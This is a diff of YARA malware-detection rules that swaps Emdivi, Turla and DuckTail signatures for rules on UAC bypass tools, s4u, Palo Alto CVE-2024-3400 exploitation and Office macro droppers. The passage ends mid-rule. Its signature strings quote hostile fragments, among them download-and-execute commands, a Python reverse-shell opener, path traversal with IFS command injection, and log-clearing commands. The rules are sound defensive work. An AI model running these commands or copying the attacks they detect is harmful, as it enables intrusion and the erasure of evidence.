 	strings:
-		$x1 = "Setup=unsecess.exe" fullword ascii
-		$x2 = "Setup=leassnp.exe" fullword ascii
-		$s1 = "&Enter password for the encrypted file:" fullword wide
-		$s2 = ";The comment below contains SFX script commands" fullword ascii
-		$s3 = "Path=%temp%" fullword ascii
+		$x1 = "\\UACElevator.pdb" ascii
+		$s1 = "%userprofile%\\Downloads\\dwmapi.dll" fullword ascii
+		$s2 = "%windir%\\system32\\dwmapi.dll" fullword ascii
+		$s3 = "Infection module: %s" fullword ascii
+		$s4 = "Could not save module to %s" fullword ascii
+		$s5 = "%s%s%p%s%ld%s%d%s" fullword ascii
+		$s6 = "Stack area around _alloca memory reserved by this function is corrupted" fullword ascii
+		$s7 = "Stack around the variable '" fullword ascii
+		$s8 = "MSVCR120D.dll" fullword wide
+		$s9 = "Address: 0x" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 740KB and ( 1 of ( $x* ) and all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 172KB and ( $x1 or 8 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Emdivi_Gen1 : FILE
+rule SIGNATURE_BASE_S4U : FILE
 {
 	meta:
-		description = "Detects Emdivi Malware"
-		author = "Florian Roth (Nextron Systems) @Cyber0ps"
-		id = "807cf3f9-4f58-5d22-88b2-9adb7866979f"
-		date = "2015-08-20"
+		description = "Detects s4u executable which allows the creation of a cmd.exe with the context of any user without requiring the password. - file s4u.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0d746311-56fe-538c-946c-3a3dd1603adc"
+		date = "2015-06-05"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bluetermite_emdivi.yar#L32-L60"
+		reference = "https://github.com/aurel26/s-4-u-for-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_uac_elevators.yar#L92-L139"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e1895926f6327bf301b8618f9162cacb30ad96f181f197559d399675e2cd93c6"
-		score = 80
-		quality = 85
+		hash = "cfc18f3d5306df208461459a8e667d89ce44ed77"
+		logic_hash = "b1882710f2514fb44ff01631636c0a66beef620c8bea644ebe05cd5385a9e494"
+		score = 50
+		quality = 83
 		tags = "FILE"
-		super_rule = 1
-		hash1 = "17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24"
-		hash2 = "3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1"
-		hash3 = "6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662"
-		hash4 = "90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "wmic nteventlog where filename=\"SecEvent\" call cleareventlog" fullword wide
-		$x2 = "del %Temp%\\*.exe %Temp%\\*.dll %Temp%\\*.bat %Temp%\\*.ps1 %Temp%\\*.cmd /f /q" fullword wide
-		$x3 = "userControl-v80.exe" fullword ascii
-		$s1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727.42)" fullword wide
-		$s2 = "http://www.msftncsi.com" fullword wide
-		$s3 = "net use | find /i \"c$\"" fullword wide
-		$s4 = " /del /y & " fullword wide
-		$s5 = "\\auto.cfg" wide
-		$s6 = "/ncsi.txt" fullword wide
-		$s7 = "Dcmd /c" fullword wide
-		$s8 = "/PROXY" fullword wide
+		$x0 = "s4u.exe Domain\\Username [Extra SID]" fullword ascii
+		$x1 = "\\Release\\s4u.pdb" ascii
+		$s0 = "CreateProcessAsUser failed (error %u)." fullword ascii
+		$s1 = "GetTokenInformation failed (error: %u)." fullword ascii
+		$s2 = "LsaLogonUser failed (error 0x%x)." fullword ascii
+		$s3 = "LsaLogonUser: OK, LogonId: 0x%x-0x%x" fullword ascii
+		$s4 = "LookupPrivilegeValue failed (error: %u)." fullword ascii
+		$s5 = "The token does not have the specified privilege (%S)." fullword ascii
+		$s6 = "Unable to parse command line." fullword ascii
+		$s7 = "Unable to find logon SID." fullword ascii
+		$s8 = "AdjustTokenPrivileges failed (error: %u)." fullword ascii
+		$s9 = "AdjustTokenPrivileges (%S): OK" fullword ascii
+		$g1 = "%systemroot%\\system32\\cmd.exe" wide
+		$g2 = "SeTcbPrivilege" wide
+		$g3 = "winsta0\\default" wide
+		$g4 = ".rsrc"
+		$g5 = "HeapAlloc"
+		$g6 = "GetCurrentProcess"
+		$g7 = "HeapFree"
+		$g8 = "GetProcessHeap"
+		$g9 = "ExpandEnvironmentStrings"
+		$g10 = "ConvertStringSidToSid"
+		$g11 = "LookupPrivilegeValue"
+		$g12 = "AllocateLocallyUniqueId"
+		$g13 = "ADVAPI32.dll"
+		$g14 = "LsaLookupAuthenticationPackage"
+		$g15 = "Secur32.dll"
+		$g16 = "MSVCR120.dll"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and ( 1 of ( $x* ) or all of ( $s* ) or all of ( $g* ) )
 }
-rule SIGNATURE_BASE_Emdivi_Gen2 : FILE
+rule SIGNATURE_BASE_UACME_Akagi_2 : FILE
 {
 	meta:
-		description = "Detects Emdivi Malware"
-		author = "Florian Roth (Nextron Systems) @Cyber0ps"
-		id = "9a77c85c-84b0-5e0f-93bc-e17e2aaec095"
-		date = "2015-08-20"
-		modified = "2023-01-27"
-		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bluetermite_emdivi.yar#L62-L85"
+		description = "Detects Windows User Account Control Bypass - from files Akagi32.exe, Akagi64.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1177d663-1081-5d17-9dd7-1218d95d90f7"
+		date = "2017-02-03"
+		modified = "2023-12-05"
+		reference = "https://github.com/hfiref0x/UACME"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_uac_elevators.yar#L151-L174"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c40306d646c5bf8c3aff1bc697b81997b4d635ccf237775e2bea96b89f7fa001"
+		logic_hash = "f79a82d466f51c86a0e6fb89688708c35dbcc7ba8f4543e5fb7565d41dd3faab"
 		score = 80
 		quality = 85
 		tags = "FILE"
-		super_rule = 1
-		hash1 = "9a351885bf5f6fec466f30021088504d96e9db10309622ed198184294717add1"
-		hash2 = "a5be7cb1f37030c9f9211c71e0fbe01dae19ff0e6560c5aab393621f18a7d012"
-		hash3 = "9183abb9b639699cd2ad28d375febe1f34c14679b7638d1a79edb49d920524a4"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "caf744d38820accb48a6e50216e547ed2bb3979604416dbcfcc991ce5e18f4ca"
+		hash2 = "609e9b15114e54ffc40c05a8980cc90f436a4a77c69f3e32fe391c0b130ff1c5"
 
 	strings:
-		$s1 = "%TEMP%\\IELogs\\" ascii
-		$s2 = "MSPUB.EXE" fullword ascii
-		$s3 = "%temp%\\" ascii
-		$s4 = "\\NOTEPAD.EXE" ascii
-		$s5 = "%4d-%02d-%02d %02d:%02d:%02d " fullword ascii
-		$s6 = "INTERNET_OPEN_TYPE_PRECONFIG" fullword ascii
-		$s7 = "%4d%02d%02d%02d%02d%02d" fullword ascii
+		$x1 = "Usage: Akagi.exe [Method] [OptionalParamToExecute]" fullword wide
+		$x2 = "[UCM] Target file already exists, abort" fullword wide
+		$s1 = "MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options" fullword wide
+		$s2 = "Akagi.exe" fullword wide
+		$s3 = "Elevation:Administrator!new:{3AD05575-8857-4850-9277-11B85BDB8E09}" fullword wide
+		$s4 = "/c wusa %ws /extract:%%windir%%\\system32\\sysprep" fullword wide
+		$s5 = "/c wusa %ws /extract:%%windir%%\\system32\\migwiz" fullword wide
+		$s6 = "loadFrom=\"%systemroot%\\system32\\sysprep\\cryptbase.DLL\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1300KB and 6 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( 6 of them )
 }
-rule SIGNATURE_BASE_MAL_Emdivi_Gen3 : FILE
+rule SIGNATURE_BASE_APT_UTA028_Forensicartefacts_Paloalto_CVE_2024_3400_Apr24_1 : SCRIPT CVE_2024_3400
 {
 	meta:
-		description = "Detects Emdivi Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c3d712ae-3f8e-578c-81cd-fd3e48213875"
-		date = "2015-08-20"
-		modified = "2023-01-06"
-		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bluetermite_emdivi.yar#L87-L114"
+		description = "Detects forensic artefacts of APT UTA028 as found in a campaign exploiting the Palo Alto CVE-2024-3400 vulnerability"
+		author = "Florian Roth"
+		id = "32cf18ff-784d-5849-87f8-14ede7315188"
+		date = "2024-04-15"
+		modified = "2024-04-18"
+		reference = "https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_paloalto_cve_2024_3400_apr24.yar#L2-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ff89a0855481d723f23e0c00f6b6eaf912e6df3a7e9ebe4ff1e6ccf2b02f0888"
-		score = 80
+		logic_hash = "1261eecca520daa0619859a45d2289d2c23c73be55e1a3849d2032a38e137f4d"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		super_rule = 1
-		hash1 = "008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e"
-		hash2 = "a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d"
+		tags = "SCRIPT, CVE-2024-3400"
 
 	strings:
-		$x1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727.42)" fullword ascii
-		$s2 = "\\Mozilla\\Firefox\\Profiles\\" ascii
-		$s4 = "\\auto.cfg" ascii
-		$s5 = "/ncsi.txt" fullword ascii
-		$s6 = "/en-us/default.aspx" fullword ascii
-		$s7 = "cmd /c" fullword ascii
-		$s9 = "APPDATA" fullword ascii
+		$x1 = "cmd = base64.b64decode(rst.group"
+		$x2 = "f.write(\"/*\"+output+\"*/\")"
+		$x3 = "* * * * * root wget -qO- http://"
+		$x4 = "rm -f /var/appweb/sslvpndocs/global-protect/*.css"
+		$x5a = "failed to unmarshal session(../"
+		$x5b = "failed to unmarshal session(./../"
+		$x6 = "rm -rf /opt/panlogs/tmp/device_telemetry/minute/*" base64
+		$x7 = "$(uname -a) > /var/" base64
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 850KB and ( ( $x1 and 1 of ( $s* ) ) or ( 4 of ( $s* ) ) )
+		1 of them
 }
-rule SIGNATURE_BASE_Emdivi_Gen4 : FILE
+rule SIGNATURE_BASE_EXPL_Paloalto_CVE_2024_3400_Apr24_1 : CVE_2024_3400
 {
 	meta:
-		description = "Detects Emdivi Malware"
-		author = "Florian Roth (Nextron Systems) @Cyber0ps"
-		id = "02629873-a797-51ff-83fc-af499cafa1e8"
-		date = "2015-08-20"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bluetermite_emdivi.yar#L116-L143"
+		description = "Detects characteristics of the exploit code used in attacks against Palo Alto GlobalProtect CVE-2024-3400"
+		author = "Florian Roth"
+		id = "1bcf0415-5351-5e09-ab93-496e8dc47c92"
+		date = "2024-04-15"
+		modified = "2025-03-21"
+		reference = "https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_paloalto_cve_2024_3400_apr24.yar#L27-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9c1645023ceefdb849cf4b0e60de8c608bfd5e15d3aac6d16d68a36140a8ebed"
-		score = 80
-		quality = 79
-		tags = "FILE"
-		super_rule = 1
-		hash1 = "008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e"
-		hash2 = "17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24"
-		hash3 = "3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1"
-		hash4 = "6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662"
-		hash5 = "90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86"
-		hash6 = "a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d"
+		logic_hash = "9ebc94a07b189a2d2dd252b5079fa494162739678fd2ca742e6877189a140da9"
+		score = 70
+		quality = 85
+		tags = "CVE-2024-3400"
 
 	strings:
-		$s1 = ".http_port\", " fullword wide
-		$s2 = "UserAgent: " fullword ascii
-		$s3 = "AUTH FAILED" fullword ascii
-		$s4 = "INVALID FILE PATH" fullword ascii
-		$s5 = ".autoconfig_url\", \"" fullword wide
-		$s6 = "FAILED TO WRITE FILE" fullword ascii
-		$s7 = ".proxy" fullword wide
-		$s8 = "AuthType: " fullword ascii
-		$s9 = ".no_proxies_on\", \"" fullword wide
+		$x1 = "SESSID=../../../../opt/panlogs/"
+		$x2 = "SESSID=./../../../../opt/panlogs/"
+		$sa1 = "SESSID=../../../../"
+		$sa2 = "SESSID=./../../../../"
+		$sb2 = "${IFS}"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 853KB and all of them
+		1 of ( $x* ) or ( 1 of ( $sa* ) and $sb2 )
 }
-rule SIGNATURE_BASE_Snaketurla_Malware_May17_1 : FILE
+rule SIGNATURE_BASE_SUSP_LNX_Base64_Download_Exec_Apr24 : SCRIPT
 {
 	meta:
-		description = "Detects Snake / Turla Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ddbbd602-b7f0-5e14-be0f-0c84bb22ddeb"
-		date = "2017-05-04"
-		modified = "2023-01-06"
-		reference = "https://goo.gl/QaOh4V"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_snaketurla_osx.yar#L11-L25"
+		description = "Detects suspicious base64 encoded shell commands used for downloading and executing further stages"
+		author = "Paul Hager"
+		id = "df8dddef-3c49-500c-abc8-7f7de5aa69ae"
+		date = "2024-04-18"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_paloalto_cve_2024_3400_apr24.yar#L48-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "12b18c9e03f1a471541de2fb3ecc6b90a13910ca299a9b7d2bad9dd11f881506"
+		logic_hash = "90b7781812b4078550b0d66ba020b3bb0a8217f2de03492af98db6c619f31929"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5b7792a16c6b7978fca389882c6aeeb2c792352076bf6a064e7b8b90eace8060"
+		tags = "SCRIPT"
 
 	strings:
-		$s1 = "/Users/vlad/Desktop/install/install/" ascii
+		$sa1 = "curl http" base64
+		$sa2 = "wget http" base64
+		$sb1 = "chmod 777 " base64
+		$sb2 = "/tmp/" base64
 
 	condition:
-		( uint16( 0 ) == 0xfacf and filesize < 200KB and all of them )
+		1 of ( $sa* ) and all of ( $sb* )
 }
-rule SIGNATURE_BASE_Snaketurla_Malware_May17_2 : FILE
+rule SIGNATURE_BASE_SUSP_PY_Import_Statement_Apr24_1
 {
 	meta:
-		description = "Detects Snake / Turla Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b3e94016-591c-5e39-b5e7-328e0761e535"
-		date = "2017-05-04"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/QaOh4V"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_snaketurla_osx.yar#L27-L42"
+		description = "Detects suspicious Python import statement and socket usage often found in Python reverse shells"
+		author = "Florian Roth"
+		id = "8e05f9a1-40a8-5d01-9e45-8779b0ff7a45"
+		date = "2024-04-15"
+		modified = "2025-03-21"
+		reference = "https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_paloalto_cve_2024_3400_apr24.yar#L67-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "35bd8650afbc515ecd1cef393fd75f9b77a1e31111612227f0f4557fe8b312a7"
-		score = 75
+		logic_hash = "d5c199d9c3e449ca282f0ca91c94ac783709299b3489f7cec38177a2f843b504"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b8ee4556dc09b28826359b98343a4e00680971a6f8c6602747bd5d723d26eaea"
+		tags = ""
 
 	strings:
-		$s1 = "b_openssl: oops - number of mutexes is 0" fullword ascii
-		$s2 = "networksetup -get%sproxy Ethernet" fullword ascii
-		$s3 = "012A04DECBC441e49C527B2798F54CA7LOG_NAMED_PIPE_NAME" fullword ascii
+		$x1 = "import sys,socket,os,pty;s=socket.socket("
 
 	condition:
-		( uint16( 0 ) == 0xfacf and filesize < 6000KB and all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Snaketurla_Malware_May17_4 : FILE
+rule SIGNATURE_BASE_SUSP_LNX_Base64_Exec_Apr24 : SCRIPT CVE_2024_3400 FILE
 {
 	meta:
-		description = "Detects Snake / Turla Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "797dedd6-a13e-529f-bae4-4043294672c4"
-		date = "2017-05-04"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/QaOh4V"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_snaketurla_osx.yar#L44-L57"
+		description = "Detects suspicious base64 encoded shell commands (as seen in Palo Alto CVE-2024-3400 exploitation)"
+		author = "Christian Burkard"
+		id = "2da3d050-86b0-5903-97eb-c5f39ce4f3a3"
+		date = "2024-04-18"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_paloalto_cve_2024_3400_apr24.yar#L81-L105"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7b6aac2313ea7dae572114e92ad0b5437c5be2542853de3b184bef780faee68b"
+		logic_hash = "e96fb7c8faac12c1f0210689f2b3a7903b42a543b97ddff11298e5ae13cae80b"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d5ea79632a1a67abbf9fb1c2813b899c90a5fb9442966ed4f530e92715087ee2"
+		tags = "SCRIPT, CVE-2024-3400, FILE"
 
 	strings:
-		$s1 = "Install Adobe Flash Player.app/com.adobe.updatePK" fullword ascii
+		$s1 = "curl http://" base64
+		$s2 = "wget http://" base64
+		$s3 = ";chmod 777 " base64
+		$mirai = "country="
+		$fp1 = "<html"
+		$fp2 = "<?xml"
 
 	condition:
-		( uint16( 0 ) == 0x4b50 and filesize < 5000KB and all of them )
+		filesize < 800KB and 1 of ( $s* ) and not $mirai and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Snaketurla_Installd_SH : FILE
+rule SIGNATURE_BASE_Office_Autoopen_Macro : FILE
 {
 	meta:
-		description = "Detects Snake / Turla Sample"
+		description = "Detects an Microsoft Office file that contains the AutoOpen Macro function"
 		author = "Florian Roth (Nextron Systems)"
-		id = "65a97c0d-5c69-5e58-9a18-10e5684bc218"
-		date = "2017-05-04"
+		id = "9774d96c-4d15-5a54-8fe2-e06372d9c4ec"
+		date = "2015-05-28"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/QaOh4V"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_snaketurla_osx.yar#L59-L72"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/general_officemacros.yar#L2-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5b16107434951ddb212996909d53dfbcdae74ed13df6690ce3f6c74258ab4670"
-		score = 75
+		logic_hash = "23c834828e7a9ea966e5d7247881bbbf9180b8f08297e36cd36d2ba5f621c70d"
+		score = 40
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4d00695d5011427efc33c9722c61ced2"
+		hash2 = "63f6b20cb39630b13c14823874bd3743"
+		hash3 = "66e67c2d84af85a569a04042141164e6"
+		hash4 = "a3035716fe9173703941876c2bde9d98"
+		hash5 = "7c06cab49b9332962625b16f15708345"
+		hash6 = "bfc30332b7b91572bfe712b656ea8a0c"
+		hash7 = "25285b8fe2c41bd54079c92c1b761381"
 
 	strings:
-		$s1 = "PIDS=`ps cax | grep installdp" ascii
-		$s2 = "${SCRIPT_DIR}/installdp ${FILE}" ascii
+		$s1 = "AutoOpen" ascii fullword
+		$s2 = "Macros" wide fullword
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 20KB and all of them )
+		( uint32be( 0 ) == 0xd0cf11e0 or uint32be( 0 ) == 0x504b0304 ) and all of ( $s* ) and filesize < 300000
 }
-rule SIGNATURE_BASE_Snaketurla_Install_SH : FILE
+rule SIGNATURE_BASE_Office_As_MHTML : CVE_2012_0158 FILE
 {
 	meta:
-		description = "Detects Snake / Turla Sample"
+		description = "Detects an Microsoft Office saved as a MHTML file (false positives are possible but rare; many matches on CVE-2012-0158)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "68775c54-46f8-5d44-ba63-6726d2bb8016"
-		date = "2017-05-04"
+		id = "21c0c3da-7295-54ad-9947-557a3180af3a"
+		date = "2015-05-28"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/QaOh4V"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_snaketurla_osx.yar#L74-L87"
+		reference = "https://www.trustwave.com/Resources/SpiderLabs-Blog/Malicious-Macros-Evades-Detection-by-Using-Unusual-File-Format/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/general_officemacros.yar#L28-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "019d20ca6632759cf01962d336c22831edc64b6927d8b27d026b76eb118fce02"
-		score = 75
+		logic_hash = "d5836a9c627e2e6833ea9e27526c76c00fc1fcf1fca8ea10777aa6f4bcc25053"
+		score = 40
 		quality = 85
-		tags = "FILE"
+		tags = "CVE-2012-0158, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8391d6992bc037a891d2e91fd474b91bd821fe6cb9cfc62d1ee9a013b18eca80"
+		hash2 = "1ff3573fe995f35e70597c75d163bdd9bed86e2238867b328ccca2a5906c4eef"
+		hash3 = "d44a76120a505a9655f0224c6660932120ef2b72fee4642bab62ede136499590"
+		hash4 = "5b8019d339907ab948a413d2be4bdb3e5fdabb320f5edc726dc60b4c70e74c84"
 
 	strings:
-		$s1 = "${TARGET_PATH}/installd.sh" ascii
-		$s2 = "$TARGET_PATH2/com.adobe.update.plist" ascii
+		$s1 = "Content-Transfer-Encoding: base64" ascii fullword
+		$s2 = "Content-Type: application/x-mso" ascii fullword
+		$x1 = "QWN0aXZlTWltZQA" ascii
+		$x2 = "0M8R4KGxGuE" ascii
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 20KB and all of them )
+		uint32be( 0 ) == 0x4d494d45 and all of ( $s* ) and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_MAL_Compromised_Cert_Ducktail_Stealer_Jun23 : FILE
+rule SIGNATURE_BASE_Docm_In_PDF : FILE
 {
 	meta:
-		description = "Detects binaries signed with compromised certificates used by DuckTail stealer - identified in June 2023"
-		author = "dr4k0nia"
-		id = "b491e1b6-42c4-58e9-8efa-19e697804f96"
-		date = "2023-06-16"
-		modified = "2023-08-12"
+		description = "Detects an embedded DOCM in PDF combined with OpenAction"
+		author = "Florian Roth (Nextron Systems)"
+		id = "08dfdfda-8ea5-530d-b89b-560415855080"
+		date = "2017-05-15"
+		modified = "2023-12-05"
 		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_ducktail_compromised_certs_jun23.yar#L2-L37"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/general_officemacros.yar#L52-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9b7916700359d662e99003727f5293f5a937254ff265c3bc8bb8763e196daa0e"
-		score = 80
-		quality = 85
+		logic_hash = "045cde0e8f9e0881c2caece7d5660e165aa67b43bed2ba6d4929951497d76494"
+		score = 75
+		quality = 60
 		tags = "FILE"
-		hash1 = "17c75f2d14af9f00822fc1dba00ccc9ec71fc50962e196d7e6f193f4b2ee0183"
-		hash2 = "b3cfdb442772d07a7f037b0bb093ba315dfd1e79b0e292736c52097355495270"
-		hash3 = "9afe013cae0167993a6a7ccd650eb1221a5ec163110565eb3a49a8b57949d4ee"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sx1 = "AZM MARKETING COMPANY LIMITED" ascii fullword
-		$sx2 = "CONG TY TNHH" ascii
-		$sx3 = {43 C3 94 4E 47 20 54 59 20 54 4E 48 48 20}
-		$sx4 = "CONG TY TRACH" ascii
-		$se1 = {65 78 BE 85 2D 48 E3 3D 4E 48 B8 D4 73 F5 B7 60}
-		$se2 = {1D 53 38 32 74 2B 58 37 87 C0 A2 53 32 F7 FB 06}
-		$se3 = {00 BD 7B 85 B2 6A 69 C9 7D 6D 68 CC 95 67 34 C0 6B}
-		$se4 = {06 5F 5C 57 0B D6 A7 98 92 FB B0 E6 34 61 3A 4D}
-		$se5 = {41 55 3F 07 13 37 11 7A 99 B4 58 57}
-		$se6 = {1E AA E4 CE E7 EE 89 FB 20 32 59 27 88 13 D8 53}
-		$se7 = {56 DC DB 85 D4 89 F9 87 B2 D6 76 72}
-		$se8 = {2D A4 50 57 C2 74 3C 1A 3C A4 93 7A}
-		$se9 = {37 AE 95 F5 4C 8E 9B D0 B6 47 68 6A}
-		$se10 = {3D C8 F5 3B 62 7A 34 07 AC 7E 01 00 13 87 A3 B3}
-		$se11 = {01 C9 87 5A 5F A8 59 68 6D 34 17 C9}
-		$se12 = {1B 35 19 E1 CD C2 6B 57 DA EE 06 C9}
-		$se13 = {79 7D 0B 5E 22 AA 0F C7 A2 97 E6 48}
-		$se14 = {57 9E 5C 89 B0 85 A7 96 B3 3C F3 19}
+		$a1 = /<<\/Names\[\([\w]{1,12}.docm\)/ ascii
+		$a2 = "OpenAction" ascii fullword
+		$a3 = "JavaScript" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of ( $sx* ) and 1 of ( $se* )
+		uint32( 0 ) == 0x46445025 and all of them
 }
-rule SIGNATURE_BASE_SUSP_TINY_PE : FILE
+rule SIGNATURE_BASE_MAL_Katz_Stealer_May25 : FILE
 {
 	meta:
-		description = "Detects Tiny PE file"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5081c24e-91d1-5705-9459-f675be4f0e3c"
-		date = "2019-10-23"
-		modified = "2023-12-05"
